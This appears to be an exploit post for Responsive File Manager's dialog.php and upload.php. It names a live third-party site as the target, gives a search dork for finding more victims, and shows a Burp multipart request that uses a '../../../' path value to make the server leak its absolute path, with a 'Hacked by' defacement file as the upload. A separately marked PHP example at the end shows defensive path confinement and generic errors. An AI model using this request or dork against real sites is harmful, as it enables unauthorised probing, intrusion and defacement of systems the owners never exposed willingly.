Live Target: http://pfionline.co.in/assets/tinymce/filemanager/dialog.php
Author: L4663r666h05t
In this case, you need Burp Suite.
Note:
Burp Suite is usually used to intercept; here I am just using it to supply a wrong directory, and the response then reveals the path on the victim's website that uses Responsive File Manager.
Dork: inurl:/filemanager/css/
Exploit: /filemanager/dialog.php
Step One: https://pasteboard.co/IFjDTTA.jpg
Step Two: https://pasteboard.co/IFjE8h2.jpg
Last Step: https://pasteboard.co/IFjEk2R.jpg
REQUEST:
POST /assets/tinymce/filemanager/upload.php HTTP/1.1
Host: user.com
Content-Length: 439
Accept: application/json
Cache-Control: no-cache
Origin: http://user.com/
X-Requested-With: XMLHttpRequest
User-Agent: -
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWwXMWsA3nGDOf2uC
Referer: http://user.com/assets/tinymce/filemanager/dialog.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ae94241e4e4aa41cfe39c424950d3eac
Connection: close

------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="path"

../../../blablabla
------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="path_thumb"

../thumbs/
------WebKitFormBoundaryWwXMWsA3nGDOf2uC
Content-Disposition: form-data; name="file"; filename="world.txt"
Content-Type: text/plain

Hacked by L4663r666h05t
------WebKitFormBoundaryWwXMWsA3nGDOf2uC--
RESPONSE:
HTTP/1.1 200 OK
Date: Tue, 05 Nov 2019 18:26:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 84
Content-Type: text/html; charset=UTF-8

wrong path (@/home/user/public_html/assets/tinymce/filemanager/upload.php#53)
Path Leaked: /home/user/public_html/
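The response above leaks the server's absolute path because the error text embeds the script's own file name and line number. Below is an added example of how an upload handler can confine the client-supplied path field and fail without disclosing filesystem details; it is not Responsive File Manager's code, and the upload root, the function names and the JSON error body are assumptions.

```php
<?php
// Added example, not Responsive File Manager's own code.
// Assumed layout: uploads live under $baseDir and the client sends a
// relative "path" field, as in the multipart request above.

function resolve_upload_dir(string $baseDir, string $requestedPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // misconfiguration: upload root does not exist
    }
    // NUL bytes truncate paths in C-level calls; reject them outright.
    if (strpos($requestedPath, "\0") !== false) {
        return null;
    }
    // realpath() collapses any "../" segments and returns false when the
    // target does not exist (the case that produced "wrong path" above).
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requestedPath);
    if ($candidate === false) {
        return null;
    }
    // Confine to the upload root: allow the root itself or a child of it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($candidate !== $base && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

function deny(string $reason): void
{
    // The detail (absolute path, line number) stays in the server log only;
    // the client receives a generic message instead of __FILE__/__LINE__.
    error_log(sprintf('filemanager upload rejected: %s from %s',
        $reason, $_SERVER['REMOTE_ADDR'] ?? '-'));
    http_response_code(400);
    header('Content-Type: application/json');
    echo json_encode(['error' => 'Invalid upload location.']);
    exit;
}

$requested = $_POST['path'] ?? '';
$dir = resolve_upload_dir(__DIR__ . '/../../uploads', $requested); // assumed root
if ($dir === null) {
    deny('path outside upload root: ' . $requested);
}
// Continue with move_uploaded_file() into $dir using a sanitised file name.
```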
Thanks to: Indonesian Code Party - Exploiter.ID